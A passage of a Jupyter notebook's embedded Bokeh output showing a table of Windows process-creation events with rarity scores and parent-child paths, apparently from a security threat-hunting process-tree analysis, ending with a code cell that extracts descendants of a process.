0x0\",\"0x0\"],\"TenantId\":[\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\",\"52b1ab41-869e-4138-9e40-2a4457f09bf0\"],\"TimeCreatedUtc\":{\"__ndarray__\":\"/Knx0k1iQMMAECfYNY52QgDAKNg1jnZCAAAq2DWOdkIAsOAtO452QgCAo9w8jnZCANA+S6OOdkIA0EzYNY52QgAATdg1jnZCAACX3DyOdkIAMC7ZNY52QgCgM9k1jnZCAODPKTuOdkIA4N4pO452QgDQazc7jnZCAGAZPTuOdkIAINhUO452QgAgGOE8jnZCAFAH9T2OdkIAcHLkPI52QgBQQmE9jnZCAIA0wz2OdkIA0IrJPY52QgCAcKk+jnZCAJBxqT6OdkIA8MaIRY52QgBwjOU1jnZCAMCi5TWOdkIAsKXwNY52QgBwxIM2jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"TimeGenerated\":{\"__ndarray__\":\"AAAAAAAAAAAAECfYNY52QgDAKNg1jnZCAAAq2DWOdkIAsOAtO452QgCAo9w8jnZCANA+S6OOdkIA0EzYNY52QgAATdg1jnZCAACX3DyOdkIAMC7ZNY52QgCgM9k1jnZCAODPKTuOdkIA4N4pO452QgDQazc7jnZCAGAZPTuOdkIAINhUO452QgAgGOE8jnZCAFAH9T2OdkIAcHLkPI52QgBQQmE9jnZCAIA0wz2OdkIA0IrJPY52QgCAcKk+jnZCAJBxqT6OdkIA8MaIRY52QgBwjOU1jnZCAMCi5TWOdkIAsKXwNY52QgBwxIM2jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"TimeGenerated_orig_par\":{\"__ndarray__\":\"/Knx0k1iQMMAAAAAAAAAAAAQJ9g1jnZCABAn2DWOdkIAACrYNY52QgAAKtg1jnZCAAAq2DWOdkIAACrYNY52QgAAKtg1jnZCAABN2DWOdkIAACrYNY52QgAwLtk1jnZCAKAz2TWOdkIA4M8pO452QgDgzyk7jnZCAKAz2TWOdkIAYBk9O452QgBgGT07jnZCACAY4TyOdkIAoDPZNY52QgCgM9k1jnZCAKAz2TWOdkIAoDPZNY52QgCgM9k1jnZCAIBwqT6OdkIAoDPZNY52QgCgM9k1jnZCAHCM5TWOdkIAoDPZNY52QgCgM9k1jnZC\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"TokenElevationType\":[\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1938\",\"%%1936\",\"%%1936\",\"%%1938\",\"%%1938\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"accountNum\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAADShQAAAAAAANKFAAAAAAAA0oUAAAAAAADShQAAAAAAANKFAAAAAAAA0oUAAAAAAADShQAAAAAAANKFAAAAAAAA0oUAAAAAAADShQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJAAAAAAAAeokAAAAAAAB6iQAAAAAAAHqJA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"cmd\":[\"cmdline unknown\",\"\\\\SystemRoot\\\\System32\\\\smss.exe 000000d8 0000...\",\"%SystemRoot%\\\\system32\\\\csrss.exe ObjectDirec...\",\"winlogon.exe\",\"\\\"fontdrvhost.exe\\\"\",\"\\\"dwm.exe\\\"\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3fdc855...\",\"\\\"LogonUI.exe\\\" /flags:0x0 /state0:0xa3a7d855...\",\"\\\"dwm.exe\\\"\",\"C:\\\\Windows\\\\system32\\\\WerFault.exe -u -p 3160...\",\"C:\\\\Windows\\\\system32\\\\userinit.exe\",\"C:\\\\Windows\\\\Explorer.EXE\",\"\\\"C:\\\\Program Files\\\\Internet Explorer\\\\iexplor...\",\"\\\"C:\\\\Program Files (x86)\\\\Internet Explorer\\\\I...\",\"\\\"C:\\\\Windows\\\\System32\\\\msiexec.exe\\\" /i \\\"C:\\\\Us...\",\"\\\"C:\\\\Program Files\\\\PuTTY\\\\putty.exe\\\" \",\"putty\",\"putty\",\"putty\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagno...\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\System32\\\\NOTEPAD.EXE\\\" C:\\\\Diagno...\",\"\\\"C:\\\\Windows\\\\system32\\\\cmd.exe\\\" \",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xfffff...\",\"\\\"C:\\\\Windows\\\\system32\\\\taskmgr.exe\\\" /4\",\"\\\"C:\\\\Windows\\\\system32\\\\CompMgmtLauncher.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\ServerManager.exe\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\s...\",\"\\\"C:\\\\Windows\\\\system32\\\\mmc.exe\\\" \\\"C:\\\\Windows\\\\s...\"],\"commandlineLen\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAABIQAAAAAAAgG5AAAAAAAAAKEAAAAAAAAAxQAAAAAAAACJAAAAAAAAAT0AAAAAAAABPQAAAAAAAACJAAAAAAACASUAAAAAAAABAQAAAAAAAADdAAAAAAAAASUAAAAAAAEBXQAAAAAAAAFlAAAAAAACAQUAAAAAAAAAUQAAAAAAAABRAAAAAAAAAFEAAAAAAAABCQAAAAAAAgFFAAAAAAAAAQkAAAAAAAMBQQAAAAAAAAD5AAAAAAACAS0AAAAAAAABCQAAAAAAAgEVAAAAAAAAAREAAAAAAAMBQQAAAAAAAwFBA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineLogLen\":{\"__ndarray__\":\"AAAAAAAA+H9+bzM2Xeb6P3dsV9ZfGQNAf7LjjVNE8T+XfUs166/zP/3VT5Ynie4/ZkaA6KKt/D9mRoDooq38P/3VT5Ynie4/FnPfGjVS+z9/WMckGBX4P3/5myCjyfU/gCHYK/su+z9lXez5537/PwAAAAAAAABAoIeUsYC0+D8BQ7BX9l3mPwFDsFf2XeY/AUOwV/Zd5j/+p3dzneb4PyBmvIWFhf0//qd3c53m+D8uZVo2mjf9P3/1k+VJovc/7+YojIbY+z/+p3dzneb4P/UwvNGvIvo//7xPqAmi+T8uZVo2mjf9Py5lWjaaN/0/\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineScore\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAGauQAAAAAAAa9ZAAAAAAAB0k0AAAAAAANSZQAAAAAAA4IdAAAAAAABYs0AAAAAAACezQAAAAAAA4IdAAAAAAAA4sEAAAAAAANKoQAAAAAAAAqFAAAAAAAByskAAAAAAAH28QAAAAACAa8FAAAAAAAC4qEAAAAAAADCCQAAAAAAAMIJAAAAAAAAwgkAAAAAAAGypQAAAAAAAwrhAAAAAAABsqUAAAAAAAJC3QAAAAAAAHKVAAAAAAADls0AAAAAAAGypQAAAAAAAYK9AAAAAAAAYrUAAAAAAAPi3QAAAAAAA6bdA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineTokensFull\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAAcQAAAAAAAADVAAAAAAAAA8D8AAAAAAAAIQAAAAAAAAAhAAAAAAAAAKEAAAAAAAAAoQAAAAAAAAAhAAAAAAAAAKkAAAAAAAAAUQAAAAAAAABBAAAAAAAAAJEAAAAAAAAAzQAAAAAAAADdAAAAAAAAAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiQAAAAAAAAChAAAAAAAAAIkAAAAAAAAAoQAAAAAAAACBAAAAAAAAAJEAAAAAAAAAiQAAAAAAAACBAAAAAAAAAIEAAAAAAAAAxQAAAAAAAADFA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"commandlineTokensHash\":{\"__ndarray__\":\"AAAAAAAA+H8AAAA+Fv7EQQAAQOAkUeRBAAAAhMSprUEAAABUA++6QQAAAFQD77pBAAAAzf874UEAAADN/zvhQQAAAFQD77pBAACAWLuR3kEAAAAYe7GIQQAAAJoPrLFBAACAFB3U0kEAAIByCKLVQQAAQF+Ym9dBAABABnr720EAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMDwMmreQQAAwPCuBNVBAADA8DJq3kEAAMDwrgTVQQAAAMBFxt5BAAAAsPnQpUEAAMDwMmreQQAAAMBFxt5BAAAAwEXG3kEAAMD9uo7jQQAAwP26juNB\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29],\"isSystemSession\":[\"NaN\",true,true,true,true,true,true,true,true,true,true,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false,false],\"new_process_lc\":[\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\csrss.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\fontdrvhost.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\logonui.exe\",\"c:\\\\windows\\\\system32\\\\logonui.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\werfault.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\program files (x86)\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\windows\\\\system32\\\\msiexec.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe\",\"c:\\\\windows\\\\system32\\\\notepad.exe\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe\",\"c:\\\\windows\\\\system32\\\\notepad.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\conhost.exe\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe\",\"c:\\\\windows\\\\system32\\\\servermanager.exe\",\"c:\\\\windows\\\\system32\\\\mmc.exe\",\"c:\\\\windows\\\\system32\\\\mmc.exe\"],\"new_process_lc_par\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\"],\"parent_index\":[\"NaN\",\"22983\",\"9151\",\"9151\",\"9153\",\"9153\",\"9153\",\"9153\",\"9153\",\"9155\",\"9153\",\"9166\",\"9168\",\"12044\",\"12044\",\"9168\",\"12074\",\"12074\",\"12593\",\"9168\",\"9168\",\"9168\",\"9168\",\"9168\",\"14555\",\"9168\",\"9168\",\"9183\",\"9168\",\"9168\"],\"parent_key\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\smss.exe0x12c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\smss.exe0x13842019-02-12 20:19:42.833000\",\"c:\\\\windows\\\\system32\\\\smss.exe0x13842019-02-12 20:19:42.833000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x12ec2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x12ec2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x12ec2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x12ec2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x12ec2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\dwm.exe0xc582019-02-12 20:19:43.440000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x12ec2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\userinit.exe0x89c2019-02-12 20:19:47.043000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe0x77d82019-02-12 21:52:40.190000\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe0x77d82019-02-12 21:52:40.190000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\program files\\\\putty\\\\putty.exe0x70842019-02-12 21:53:59.190000\",\"c:\\\\program files\\\\putty\\\\putty.exe0x70842019-02-12 21:53:59.190000\",\"c:\\\\program files\\\\putty\\\\putty.exe0x752c2019-02-12 22:22:39.490000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x48782019-02-12 22:53:48.680000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe0x17582019-02-12 20:20:37.703000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\"],\"parent_proc_lc\":[\"NaN\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\smss.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\dwm.exe\",\"c:\\\\windows\\\\system32\\\\winlogon.exe\",\"c:\\\\windows\\\\system32\\\\userinit.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\program files\\\\putty\\\\putty.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe\",\"c:\\\\windows\\\\explorer.exe\",\"c:\\\\windows\\\\explorer.exe\"],\"path\":[\"22983\",\"22983/9151\",\"22983/9151/9152\",\"22983/9151/9153\",\"22983/9151/9153/12048\",\"22983/9151/9153/12589\",\"22983/9151/9153/16076\",\"22983/9151/9153/9154\",\"22983/9151/9153/9155\",\"22983/9151/9153/9155/12588\",\"22983/9151/9153/9166\",\"22983/9151/9153/9166/9168\",\"22983/9151/9153/9166/9168/12044\",\"22983/9151/9153/9166/9168/12044/12045\",\"22983/9151/9153/9166/9168/12044/12062\",\"22983/9151/9153/9166/9168/12074\",\"22983/9151/9153/9166/9168/12074/12087\",\"22983/9151/9153/9166/9168/12074/12593\",\"22983/9151/9153/9166/9168/12074/12593/14553\",\"22983/9151/9153/9166/9168/12594\",\"22983/9151/9153/9166/9168/12712\",\"22983/9151/9153/9166/9168/14534\",\"22983/9151/9153/9166/9168/14541\",\"22983/9151/9153/9166/9168/14555\",\"22983/9151/9153/9166/9168/14555/14556\",\"22983/9151/9153/9166/9168/14575\",\"22983/9151/9153/9166/9168/9183\",\"22983/9151/9153/9166/9168/9183/9184\",\"22983/9151/9153/9166/9168/9195\",\"22983/9151/9153/9166/9168/9267\"],\"pathHash\":{\"__ndarray__\":\"AAAAAAAA+H8AAIBgNL7PQQAAAMRaEJxBAACA6N9D0EEAAAA3TnS8QQAAAGROBOhBAAAARH5c70EAAABEflzvQQAAAGROBOhBAAAAzx4zyEEAAIDhJ07qQQAA4BxeS+VBAADAaBhI5kEAAADsKBHLQQAAwH0nmdRBAACA2UpBxEEAAIDZSkHEQQAAgNlKQcRBAACA2UpBxEEAAACbZ+nFQQAA4Pq9OOZBAAAAm2fpxUEAAOD6vTjmQQAAQMQBW+VBAADA9qn02UEAAACbZ+nFQQAAAIYmwNVBAACADDTs00EAAMBb6jHSQQAAwFvqMdJB\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"pathLogScore\":{\"__ndarray__\":\"AAAAAAAA+H/3ZEArsHgLQE5HWjQcmgtArfKuuW35C0BJ9j0P5lQMQFBjURtwTgtAFUMXynK8C0AVQxfKcrwLQFBjURtwTgtAPlORFz3mC0DM/wSJIPsLQKENMwTA5gpAsuM0XJJRDUB7ivwcPpENQIOAyOmx1AtAaeelXOvjC0Bp56Vc6+MLQGnnpVzr4wtAaeelXOvjC0DR9ObVeM4LQAIyEAPP0wtA0fTm1XjOC0ACMhADz9MLQFUKcgSLRwtA5eDLP2jZC0DR9ObVeM4LQNtdOwbYtgxAxyk4LFRxDEChBVMAp0oLQKEFUwCnSgtA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"pathScore\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAADilQAAAAAAACKZAAAAAAACGqEAAAAAAAC6rQAAAAAAAPKRAAAAAAADmpkAAAAAAAOamQAAAAAAAPKRAAAAAAAAAqEAAAAAAAJKoQAAAAAAAAqJAAAAAAAAOskAAAAAAAGWzQAAAAAAAiKdAAAAAAADwp0AAAAAAAPCnQAAAAAAA8KdAAAAAAADwp0AAAAAAAF6nQAAAAAAAgqdAAAAAAABep0AAAAAAAIKnQAAAAAAAFKRAAAAAAACop0AAAAAAAF6nQAAAAAAAWK5AAAAAAAAQrEAAAAAAACakQAAAAAAAJqRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]},\"proc_key\":[\"c:\\\\windows\\\\system32\\\\smss.exe0x12c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\smss.exe0x13842019-02-12 20:19:42.833000\",\"c:\\\\windows\\\\system32\\\\csrss.exe0x13542019-02-12 20:19:42.860000\",\"c:\\\\windows\\\\system32\\\\winlogon.exe0x12ec2019-02-12 20:19:42.880000\",\"c:\\\\windows\\\\system32\\\\fontdrvhost.exe0x7c6c2019-02-12 21:52:56.843000\",\"c:\\\\windows\\\\system32\\\\dwm.exe0x2cac2019-02-12 22:22:21.240000\",\"c:\\\\windows\\\\system32\\\\logonui.exe0x34702019-02-14 04:12:29.037000\",\"c:\\\\windows\\\\system32\\\\logonui.exe0xc7c2019-02-12 20:19:43.437000\",\"c:\\\\windows\\\\system32\\\\dwm.exe0xc582019-02-12 20:19:43.440000\",\"c:\\\\windows\\\\system32\\\\werfault.exe0x75c42019-02-12 22:22:21.040000\",\"c:\\\\windows\\\\system32\\\\userinit.exe0x89c2019-02-12 20:19:47.043000\",\"c:\\\\windows\\\\explorer.exe0xcb02019-02-12 20:19:47.130000\",\"c:\\\\program files\\\\internet explorer\\\\iexplore.exe0x77d82019-02-12 21:52:40.190000\",\"c:\\\\program files (x86)\\\\internet explorer\\\\iexplore.exe0x6e042019-02-12 21:52:40.430000\",\"c:\\\\windows\\\\system32\\\\msiexec.exe0x7ea82019-02-12 21:53:35.933000\",\"c:\\\\program files\\\\putty\\\\putty.exe0x70842019-02-12 21:53:59.190000\",\"c:\\\\program files\\\\putty\\\\putty.exe0x34a02019-02-12 21:55:36.450000\",\"c:\\\\program files\\\\putty\\\\putty.exe0x752c2019-02-12 22:22:39.490000\",\"c:\\\\program files\\\\putty\\\\putty.exe0x79902019-02-12 22:41:29.717000\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe0x6d302019-02-12 22:22:53.223000\",\"c:\\\\windows\\\\system32\\\\notepad.exe0x38202019-02-12 22:31:24.453000\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe0x5f842019-02-12 22:38:05.640000\",\"c:\\\\windows\\\\system32\\\\notepad.exe0x61d02019-02-12 22:38:31.597000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x48782019-02-12 22:53:48.680000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x51fc2019-02-12 22:53:48.697000\",\"c:\\\\windows\\\\system32\\\\taskmgr.exe0x18c42019-02-13 00:53:54.927000\",\"c:\\\\windows\\\\system32\\\\compmgmtlauncher.exe0x17582019-02-12 20:20:37.703000\",\"c:\\\\windows\\\\system32\\\\servermanager.exe0x17842019-02-12 20:20:38.060000\",\"c:\\\\windows\\\\system32\\\\mmc.exe0x14702019-02-12 20:21:23.163000\",\"c:\\\\windows\\\\system32\\\\mmc.exe0xe8c2019-02-12 20:31:25.767000\"],\"processName\":[\"NaN\",\"smss.exe\",\"csrss.exe\",\"winlogon.exe\",\"fontdrvhost.exe\",\"dwm.exe\",\"LogonUI.exe\",\"LogonUI.exe\",\"dwm.exe\",\"WerFault.exe\",\"userinit.exe\",\"explorer.exe\",\"iexplore.exe\",\"iexplore.exe\",\"msiexec.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"putty.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"Taskmgr.exe\",\"notepad.exe\",\"cmd.exe\",\"conhost.exe\",\"Taskmgr.exe\",\"CompMgmtLauncher.exe\",\"ServerManager.exe\",\"mmc.exe\",\"mmc.exe\"],\"source_index\":[\"22983\",\"9151\",\"9152\",\"9153\",\"12048\",\"12589\",\"16076\",\"9154\",\"9155\",\"12588\",\"9166\",\"9168\",\"12044\",\"12045\",\"12062\",\"12074\",\"12087\",\"12593\",\"14553\",\"12594\",\"12712\",\"14534\",\"14541\",\"14555\",\"14556\",\"14575\",\"9183\",\"9184\",\"9195\",\"9267\"],\"source_index_par\":{\"__ndarray__\":\"AAAAAAAA+H8AAAAAAAD4fwAAAABAF9RAAAAAAEAX1EAAAAAAQBnUQAAAAABAGdRAAAAAAEAZ1EAAAAAAQBnUQAAAAABAGdRAAAAAAAAc1EAAAAAAQBnUQAAAAAAACdRAAAAAAIAJ1EAAAAAAwGHWQAAAAADAYdZAAAAAAIAJ1EAAAAAAQGHWQAAAAABAYdZAAAAAAIBc1kAAAAAAgAnUQAAAAACACdRAAAAAAIAJ1EAAAAAAgAnUQAAAAACACdRAAAAAAEDd00AAAAAAgAnUQAAAAACACdRAAAAAAMBt1kAAAAAAgAnUQAAAAACACdRA\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[30]}},\"selected\":{\"id\":\"1710\"},\"selection_policy\":{\"id\":\"1711\"}},\"id\":\"1563\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"format\":\"%F %T\"},\"id\":\"1670\",\"type\":\"DateFormatter\"},{\"attributes\":{\"columns\":[{\"id\":\"1671\"},{\"id\":\"1673\"},{\"id\":\"1674\"},{\"id\":\"1675\"},{\"id\":\"1676\"},{\"id\":\"1677\"},{\"id\":\"1678\"},{\"id\":\"1679\"},{\"id\":\"1680\"},{\"id\":\"1681\"},{\"id\":\"1682\"}],\"height\":150,\"source\":{\"id\":\"1563\"},\"view\":{\"id\":\"1684\"},\"width\":950},\"id\":\"1683\",\"type\":\"DataTable\"},{\"attributes\":{\"editor\":{\"id\":\"1690\"},\"field\":\"SubjectUserName\",\"formatter\":{\"id\":\"1691\"},\"title\":\"SubjectUserName\"},\"id\":\"1673\",\"type\":\"TableColumn\"},{\"attributes\":{\"color_mapper\":{\"id\":\"1564\"},\"formatter\":{\"id\":\"1715\"},\"location\":[0,0],\"ticker\":{\"id\":\"1714\"},\"width\":8},\"id\":\"1565\",\"type\":\"ColorBar\"},{\"attributes\":{\"editor\":{\"id\":\"1689\"},\"field\":\"TimeGenerated\",\"formatter\":{\"id\":\"1670\"},\"title\":\"TimeGenerated\"},\"id\":\"1671\",\"type\":\"TableColumn\"},{\"attributes\":{\"dimensions\":\"height\"},\"id\":\"1585\",\"type\":\"PanTool\"},{\"attributes\":{\"children\":[{\"id\":\"1566\"},{\"id\":\"1627\"}]},\"id\":\"1669\",\"type\":\"Row\"}],\"root_ids\":[\"1685\"]},\"title\":\"Bokeh Application\",\"version\":\"2.1.1\"}};\n", " var render_items = [{\"docid\":\"44d120b6-6abe-4c10-8699-9a55653f0815\",\"root_ids\":[\"1685\"],\"roots\":{\"1685\":\"77a13f6b-3d75-4cc8-8752-213fedcbacbc\"}}];\n", " root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n", "\n", " }\n", " if (root.Bokeh !== undefined) {\n", " embed_document(root);\n", " } else {\n", " var attempts = 0;\n", " var timer = setInterval(function(root) {\n", " if (root.Bokeh !== undefined) {\n", " clearInterval(timer);\n", " embed_document(root);\n", " } else {\n", " attempts++;\n", " if (attempts > 100) {\n", " clearInterval(timer);\n", " console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n", " }\n", " }\n", " }, 10, root)\n", " }\n", "})(window);" ], "application/vnd.bokehjs_exec.v0+json": "" }, "metadata": { "application/vnd.bokehjs_exec.v0+json": { "id": "1685" } }, "output_type": "display_data" }, { "data": { "text/plain": [ "(Figure(id='1566', ...), Column(id='1685', ...))" ] }, "execution_count": 9, "metadata": {}, "output_type": "execute_result" } ], "source": [ "svcs_tree = ptree.get_descendents(proc_rarity_tree, prar_roots.iloc[22])\n", 